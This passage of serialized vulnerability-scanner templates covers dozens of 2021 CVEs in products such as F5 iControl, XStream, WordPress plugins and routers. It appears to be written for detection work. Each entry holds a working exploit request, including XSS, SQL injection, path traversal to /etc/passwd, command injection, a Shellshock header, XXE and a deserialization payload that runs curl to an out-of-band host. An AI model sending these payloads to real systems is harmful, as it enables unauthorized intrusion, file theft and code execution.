Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}//interact.sh/%2f.."],"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]},{"type":"status","status":[302,301]}]}]},{"id":"CVE-2021-33904","info":{"name":"Accela Civic Platform <=21.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/security/hostSignon.do?hostSignOn=true&servProvCode=k3woq%22%5econfirm(document.domain)%5e%22a2pbrnzx5a9"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","words":["\"k3woq\"^confirm(document.domain)^\"a2pbrnzx5a9\"","servProvCode"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-22986","info":{"name":"F5 iControl REST -  Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /mgmt/shared/authn/login HTTP/1.1\nHost: {{Hostname}}\nAccept-Language: en\nAuthorization: Basic YWRtaW46\nContent-Type: application/json\nCookie: BIGIPAuthCookie=1234\nConnection: close\n\n{\"username\":\"admin\",\"userReference\":{},\"loginReference\":{\"link\":\"http://localhost/mgmt/shared/gossip\"}}\n","POST /mgmt/tm/util/bash HTTP/1.1\nHost: {{Hostname}}\nAccept-Language: en\nX-F5-Auth-Token: {{token}}\nContent-Type: application/json\nConnection: close\n\n{\"command\":\"run\",\"utilCmdArgs\":\"-c id\"}\n"],"matchers":[{"type":"word","words":["commandResult","uid="],"condition":"and"}],"extractors":[{"type":"regex","name":"token","group":1,"regex":["([A-Z0-9]{26})"],"internal":true,"part":"body"},{"type":"regex","group":1,"regex":["\"commandResult\":\"(.*)\""],"part":"body"}]}]},{"id":"CVE-2021-27315","info":{"name":"Doctor Appointment System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 10s\nPOST /contactus.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nfirstname={{randstr}}&lastname={{randstr}}&email={{randstr}}%40test.com&comment=test'+AND+(SELECT+6133+FROM+(SELECT(SLEEP(6)))nOqb)+AND+'RiUU'='RiUU&submit=Send+Us\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 500","contains(body, \"Medical Management System\")"],"condition":"and"}]}]},{"id":"CVE-2021-21389","info":{"name":"BuddyPress REST API  <7.2.1 - Privilege Escalation/Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /wp-json/buddypress/v1/signup HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json; charset=UTF-8\n\n{\n  \"user_login\":\"{{randstr}}\",\n  \"password\":\"{{randstr}}\",\n  \"user_name\":\"{{randstr}}\",\n  \"user_email\":\"{{randstr}}@interact.sh\"\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["user_login","registered","activation_key","user_email"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-36580","info":{"name":"IceWarp Mail Server - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webmail/basic/?referer=https://interact.sh&_c=auth&ctz=120&signup_password=&_a%5bsignup%5d=1"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2021-29203","info":{"name":"HPE Edgeline Infrastructure Manager <1.22 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["PATCH /redfish/v1/SessionService/ResetPassword/1/ HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/json\n\n{\"Password\":\"{{randstr}}\"}\n","POST /redfish/v1/SessionService/Sessions/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"UserName\":\"Administrator\",\"Password\":\"{{randstr}}\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["X-Auth-Token","PasswordReset","Location"],"condition":"and"},{"type":"word","part":"body","words":["Base.1.0.Created"]},{"type":"status","status":[201]}]}]},{"id":"CVE-2021-40149","info":{"name":"Reolink E1 Zoom Camera <=3.0.0.716 - Private Key Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/self.key"],"matchers-condition":"and","matchers":[{"type":"word","words":["-----BEGIN RSA PRIVATE KEY-----","-----END RSA PRIVATE KEY----"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24150","info":{"name":"WordPress Like Button Rating <2.6.32 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["@timeout: 10s\nGET /wp-admin/admin-ajax.php?action=likebtn_prx&likebtn_q={{base64('http://likebtn.com.oast.me')}}\" HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Interactsh Server"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21345","info":{"name":"XStream <1.4.16  - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<java.util.PriorityQueue serialization='custom'>\n  <unserializable-parents/>\n  <java.util.PriorityQueue>\n    <default>\n      <size>2</size>\n      <comparator class='sun.awt.datatransfer.DataTransferer$IndexOrderComparator'>\n        <indexMap class='com.sun.xml.internal.ws.client.ResponseContext'>\n          <packet>\n            <message class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XMLMultiPart'>\n              <dataSource class='com.sun.xml.internal.ws.message.JAXBAttachment'>\n                <bridge class='com.sun.xml.internal.ws.db.glassfish.BridgeWrapper'>\n                  <bridge class='com.sun.xml.internal.bind.v2.runtime.BridgeImpl'>\n                    <bi class='com.sun.xml.internal.bind.v2.runtime.ClassBeanInfoImpl'>\n                      <jaxbType>com.sun.corba.se.impl.activation.ServerTableEntry</jaxbType>\n                      <uriProperties/>\n                      <attributeProperties/>\n                      <inheritedAttWildcard class='com.sun.xml.internal.bind.v2.runtime.reflect.Accessor$GetterSetterReflection'>\n                        <getter>\n                          <class>com.sun.corba.se.impl.activation.ServerTableEntry</class>\n                          <name>verify</name>\n                          <parameter-types/>\n                        </getter>\n                      </inheritedAttWildcard>\n                    </bi>\n                    <tagName/>\n                    <context>\n                      <marshallerPool class='com.sun.xml.internal.bind.v2.runtime.JAXBContextImpl$1'>\n                        <outer-class reference='../..'/>\n                      </marshallerPool>\n                      <nameList>\n                        <nsUriCannotBeDefaulted>\n                          <boolean>true</boolean>\n                        </nsUriCannotBeDefaulted>\n                        <namespaceURIs>\n                          <string>1</string>\n                        </namespaceURIs>\n                        <localNames>\n                          <string>UTF-8</string>\n                        </localNames>\n                      </nameList>\n                    </context>\n                  </bridge>\n                </bridge>\n                <jaxbObject class='com.sun.corba.se.impl.activation.ServerTableEntry'>\n                  <activationCmd>curl http://{{interactsh-url}}</activationCmd>\n                </jaxbObject>\n              </dataSource>\n            </message>\n            <satellites/>\n            <invocationProperties/>\n          </packet>\n        </indexMap>\n      </comparator>\n    </default>\n    <int>3</int>\n    <string>javax.xml.ws.binding.attachments.inbound</string>\n    <string>javax.xml.ws.binding.attachments.inbound</string>\n  </java.util.PriorityQueue>\n</java.util.PriorityQueue>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2021-40150","info":{"name":"Reolink E1 Zoom Camera <=3.0.0.716 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/conf/nginx.conf"],"matchers-condition":"and","matchers":[{"type":"word","words":["server","listen","fastcgi"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-3002","info":{"name":"Seo Panel 4.8.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /seo/seopanel/login.php?sec=forgot HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsec=requestpass&email=test%40test.com%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3e11&code=AAAAA&login=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["<img src=a onerror=alert(document.domain)>","seopanel"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21978","info":{"name":"VMware View Planner <4.6 SP1- Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /logupload?logMetaData=%7B%22itrLogPath%22%3A%20%22..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhttpd%2Fhtml%2Fwsgi_log_upload%22%2C%20%22logFileType%22%3A%20%22log_upload_wsgi.py%22%2C%20%22workloadID%22%3A%20%222%22%7D HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarySHHbUsfCoxlX1bpS\nAccept: text/html\nReferer: {{BaseURL}}\nConnection: close\n\n------WebKitFormBoundarySHHbUsfCoxlX1bpS\nContent-Disposition: form-data; name=\"logfile\"; filename=\"\"\nContent-Type: text/plain\n\nPOC_TEST\n\n------WebKitFormBoundarySHHbUsfCoxlX1bpS\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["len(body) == 28"]},{"type":"word","part":"body","words":["File uploaded successfully."]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24970","info":{"name":"WordPress All-In-One Video Gallery <2.5.0 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=all-in-one-video-gallery&tab=..%2F..%2F..%2F..%2F..%2Findex  HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"All-in-One Video Gallery\")","contains(body_2, \"Hello world!\")","contains(body_2, \"Welcome to WordPress\")"],"condition":"and"}]}]},{"id":"CVE-2021-45428","info":{"name":"Telesquare TLR-2005KSH 1.0.0 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["GET /{{randstr}}.txt HTTP/1.1\nHost: {{Hostname}}\n","PUT /{{randstr}}.txt HTTP/1.1\nHost: {{Hostname}}\n\nCVE-2021-45428\n","GET /{{randstr}}.txt HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["status_code_1 == 404 && status_code_2 == 201","contains(body_3, \"CVE-2021-45428\") && status_code_3 == 200"],"condition":"and"}]}]},{"id":"CVE-2021-24370","info":{"name":"WordPress Fancy Product Designer <4.6.9  - Arbitrary File Upload","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"error\":\"You need to define a directory"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-23241","info":{"name":"MERCUSYS Mercury X18G 1.0.5 Router - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/loginLess/../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-35380","info":{"name":"TermTalk Server 3.24.0.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/file?valore=../../../../../windows/win.ini"],"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2021-21805","info":{"name":"Advantech R-SeeNet 2.4.12 - OS Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/php/ping.php?hostname=|dir"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>Ping |dir</title>","bottom.php"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-22911","info":{"name":"Rocket.Chat <=3.13 - NoSQL Injection","severity":"critical"},"requests":[{"raw":["POST /api/v1/method.callAnon/getPasswordPolicy HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"message\": \"{\\\"msg\\\":\\\"method\\\", \\\"method\\\": \\\"getPasswordPolicy\\\", \\\"params\\\": [{\\\"token\\\": {\\\"$regex\\\": \\\"^{{randstr}}\\\"}}] }\"}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["[error-invalid-user]","\"success\":true"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-46107","info":{"name":"Ligeo Archives Ligeo Basics - Server Side Request Forgery","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","GET /archive/download?file=file:///etc/passwd HTTP/1.1\nHost: {{Hostname}}\n","GET /archive/download?file=http://{{interactsh-url}}/ HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["regex('root:.*:0:0:', body_2) && contains(body_1, 'Ligeo Archives')","contains(interactsh_protocol, 'http') && contains(body_1, 'Ligeo Archives')"]}]}]},{"id":"CVE-2021-24340","info":{"name":"WordPress Statistics <13.0.8 - Blind SQL Injection","severity":"high"},"requests":[{"raw":["GET /wp-content/plugins/wp-statistics/readme.txt HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 15s\nGET /wp-admin/admin.php?page=wps_pages_page&ID=0+AND+(SELECT+1+FROM+(SELECT(SLEEP(7)))test)&type=home HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["status_code_1 == 200","contains(body_1, \"WP Statistics\")"],"condition":"and"},{"type":"dsl","dsl":["duration_2>=7","status_code_2 == 500","contains(body_2, \">WordPress &rsaquo; Error<\") && contains(body_2, \">Your request is not valid.<\")"],"condition":"and"}]}]},{"id":"CVE-2021-28151","info":{"name":"Hongdian H8922 3.0.5 - Remote Command Injection","severity":"high"},"requests":[{"raw":["POST /tools.cgi HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic Z3Vlc3Q6Z3Vlc3Q=\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}/tools.cgi\n\nop_type=ping&destination=%3Bid\n","POST /tools.cgi HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic YWRtaW46YWRtaW4=\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}/tools.cgi\n\nop_type=ping&destination=%3Bid\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html","application/x-www-form-urlencoded"],"condition":"or"},{"type":"regex","regex":["uid=\\d+\\(([^)]+)\\) gid=\\d+\\(([^)]+)\\)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-3378","info":{"name":"FortiLogger 4.4.2.2 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /Config/SaveUploadedHotspotLogoFile HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarySHHbUsfCoxlX1bpS\nAccept: application/json\nReferer: {{BaseURL}}\nConnection: close\nX-Requested-With: XMLHttpRequest\n\n------WebKitFormBoundarySHHbUsfCoxlX1bpS\nContent-Disposition: form-data; name=\"file\"; filename=\"poc.txt\"\nContent-Type: image/png\n\n{{randstr}}\n\n------WebKitFormBoundarySHHbUsfCoxlX1bpS\n","GET /Assets/temp/hotspot/img/logohotspot.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["{{randstr}}"]},{"type":"word","part":"header","words":["text/plain","ASP.NET"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-43810","info":{"name":"Admidio - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/adm_program/system/redirect.php?url=javascript://%250aalert(document.domain)"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["please click <a href=\"javascript://%0aalert(document.domain)\" target=\"_self\">"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-37216","info":{"name":"QSAN Storage Manager <3.3.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/http_header.php"],"headers":{"X-Trigger-XSS":"<script>alert(1)</script>"},"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["!contains(tolower(header), 'x-xss-protection')"]},{"type":"word","part":"body","words":["\"HTTP_X_TRIGGER_XSS\":\"<script>alert(1)</script>\""]},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2021-43574","info":{"name":"Atmail 6.5.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?format=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/atmail/?format=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/atmail/webmail/?format=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>\" does not exist"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[500,403],"condition":"or"}]}]},{"id":"CVE-2021-46381","info":{"name":"D-Link DAP-1620 - Local File Inclusion","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/apply.cgi"],"body":"action=do_graph_auth&graph_code=94102&html_response_message=just_login&html_response_page=../../../../../../../../../../../../../../etc/passwd&log_pass=DummyPass&login_n=admin&login_name=DummyName&tkn=634855349&tmp_log_pass=DummyPass&tmp_log_pass_auth=DummyPass","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-21234","info":{"name":"Spring Boot Actuator Logview Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/manage/log/view?filename=/windows/win.ini&base=../../../../../../../../../../","{{BaseURL}}/log/view?filename=/windows/win.ini&base=../../../../../../../../../../","{{BaseURL}}/manage/log/view?filename=/etc/passwd&base=../../../../../../../../../../","{{BaseURL}}/log/view?filename=/etc/passwd&base=../../../../../../../../../../"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["regex('root:.*:0:0:', body)","status_code == 200"],"condition":"and"},{"type":"dsl","dsl":["contains(body, 'bit app support')","contains(body, 'fonts')","contains(body, 'extensions')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2021-44451","info":{"name":"Apache Superset <=1.3.2 - Default Login","severity":"medium"},"requests":[{"raw":["GET /login/ HTTP/1.1\nHost: {{Hostname}}\n","POST /login/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncsrf_token={{csrf_token}}&username={{username}}&password={{password}}\n","GET /dashboard/list/ HTTP/1.1\nHost: {{Hostname}}\n"],"payloads":{"username":["admin"],"password":["admin"]},"attack":"pitchfork","cookie-reuse":true,"req-condition":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header_2","words":["session"]},{"type":"word","part":"body_3","words":["DashboardFilterStateRestApi"]}],"extractors":[{"type":"regex","name":"csrf_token","group":1,"regex":["name=\"csrf_token\" type=\"hidden\" value=\"(.*)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-25120","info":{"name":"Easy Social Feed < 6.2.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=easy-facebook-likebox&access_token=a&type=</script><script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'type' : '</script><script>alert(document.domain)</script>'"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27905","info":{"name":"Apache Solr <=8.8.1 - Server-Side Request Forgery","severity":"critical"},"requests":[{"raw":["GET /solr/admin/cores?wt=json HTTP/1.1\nHost: {{Hostname}}\nAccept-Language: en\nConnection: close\n","GET /solr/{{core}}/replication/?command=fetchindex&masterUrl=https://interact.sh HTTP/1.1\nHost: {{Hostname}}\nAccept-Language: en\nConnection: close\n"],"matchers":[{"type":"word","part":"body","words":["<str name=\"status\">OK</str>"]}],"extractors":[{"type":"regex","name":"core","group":1,"regex":["\"name\"\\:\"(.*?)\""],"internal":true}]}]},{"id":"CVE-2021-35464","info":{"name":"ForgeRock OpenAM <7.0 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/openam/oauth2/..;/ccversion/Version"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Set-Cookie: JSESSIONID="]},{"type":"word","part":"body","words":["Version Information -","openam/ccversion/Masthead.jsp"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41277","info":{"name":"Metabase Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/geojson?url=file:///etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24940","info":{"name":"WordPress Persian Woocommerce <=5.8.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=persian-wc&s=xxxxx%22+accesskey%3DX+onclick%3Dalert%281%29+test%3D%22 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(header_2, \"text/html\")","status_code_2 == 200","contains(body_2, 'accesskey=X onclick=alert(1) test=')","contains(body_2, 'woocommerce_persian_translate')"],"condition":"and"}]}]},{"id":"CVE-2021-27651","info":{"name":"Pega Infinity - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/prweb/PRAuth/app/default/"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(version, '< 8.5.2', '>= 8.2.1')"]},{"type":"word","part":"body","words":["Pega Infinity"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["(?m)<span>Pega ([0-9.]+)</span>"],"internal":true},{"type":"regex","group":1,"regex":["(?m)<span>Pega ([0-9.]+)</span>"]}]}]},{"id":"CVE-2021-30134","info":{"name":"Php-mod/curl Library <2.3.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/vendor/curl/curl/tests/server/php-curl-test/post_file_path_upload.php?key=<img%20src%20onerror%3dalert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","words":["key\":\"<img src onerror=alert(document.domain)>\""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-20323","info":{"name":"Keycloak 10.0.0 - 18.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/auth/realms/master/clients-registrations/default","{{BaseURL}}/auth/realms/master/clients-registrations/openid-connect","{{BaseURL}}/realms/master/clients-registrations/default","{{BaseURL}}/realms/master/clients-registrations/openid-connect"],"body":"{\"Test<img src=x onerror=alert(document.domain)>\":1}","stop-at-first-match":true,"headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Unrecognized field \"Test<img src=x onerror=alert(document.domain)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[400]}]}]},{"id":"CVE-2021-25085","info":{"name":"WOOF WordPress plugin - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=woof_draw_products&woof_redraw_elements[]=<img%20src=x%20onerror=alert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"additional_fields\":[\"<img src=x onerror=alert(document.domain)>\"]}"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40875","info":{"name":"Gurock TestRail Application files.md5 Exposure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/files.md5","{{BaseURL}}/testrail/files.md5"],"stop-at-first-match":true,"max-size":1000,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["app/arguments/admin"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-20123","info":{"name":"Draytek VigorConnect 1.6.0-B - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/ACSServer/DownloadFileServlet?show_file_name=../../../../../../etc/passwd&type=uploadfile&path=anything","{{BaseURL}}/ACSServer/DownloadFileServlet?show_file_name=../../../../../../windows/win.ini&type=uploadfile&path=anything"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"regex","part":"body","regex":["root:.*:0:0:","for 16-bit app support"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-36450","info":{"name":"Verint Workforce Optimization 15.2.8.10048 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wfo/control/signin?rd=%2Fwfo%2Fcontrol%2Fmy_notifications%3FNEWUINAV%3D%22%3E%3Ch1%3ETest%3C%2Fh1%3E26 HTTP/1.1\nHost: {{Hostname}}\n","POST /wfo/control/signin?rd=%2Fwfo%2Fcontrol%2Fmy_notifications%3FNEWUINAV%3D%22%3E%3Ch1%3ETest%3Ch1%3E%26 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nbrowserCheckEnabled=true&username=admin&language=en_US&defaultHttpPort=80&screenHeight=1080&screenWidth=1920&pageModelType=0&pageDirty=false&pageAction=Login&csrfp_login={{csrfp_login}}\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><h1>Test</h1>26\" class=\"loginUserNameText"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrfp_login","group":1,"regex":["csrfp_login=([a-zA-Z0-9]+);"],"internal":true,"part":"header"}]}]},{"id":"CVE-2021-42071","info":{"name":"Visual Tools DVR VX16 4.2.28.0 - Unauthenticated OS Command Injection","severity":"critical"},"requests":[{"raw":["GET /cgi-bin/slogin/login.py HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nUser-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-33851","info":{"name":"WordPress Customize Login Image <3.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options-general.php?page=customize-login-image/customize-login-image-options.php HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/options.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\noption_page=customize-login-image-settings-group&action=update&_wpnonce={{nonce}}&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Foptions-general.php%3Fpage%3Dcustomize-login-image%252Fcustomize-login-image-options.php%26settings-updated%3Dtrue&cli_logo_url=<script>alert(document.domain)</script>&cli_logo_file=&cli_login_background_color=&cli_custom_css=\n","GET /wp-login.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["status_code_4 == 200","contains(header_4, \"text/html\")","contains(body_4, \"Go to <script>alert(document.domain)</script>\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["name=\"_wpnonce\" value=\"([0-9a-zA-Z]+)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-27931","info":{"name":"LumisXP <10.0.0 - Blind XML External Entity Attack","severity":"critical"},"requests":[{"raw":["POST /lumis/portal/controller/xml/PageControllerXml.jsp HTTP/1.1\nHost: {{Hostname}}\n\n<?xml version=\"1.0\" ?>\n<!DOCTYPE r [\n<!ELEMENT r ANY >\n<!ENTITY xxe SYSTEM \"http://{{interactsh-url}}\">\n]>\n<method name=\"addPage\">\n<id>&xxe;</id>\n</method>\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2021-24274","info":{"name":"WordPress Supsystic Ultimate Maps <1.2.5 - Cross-Site 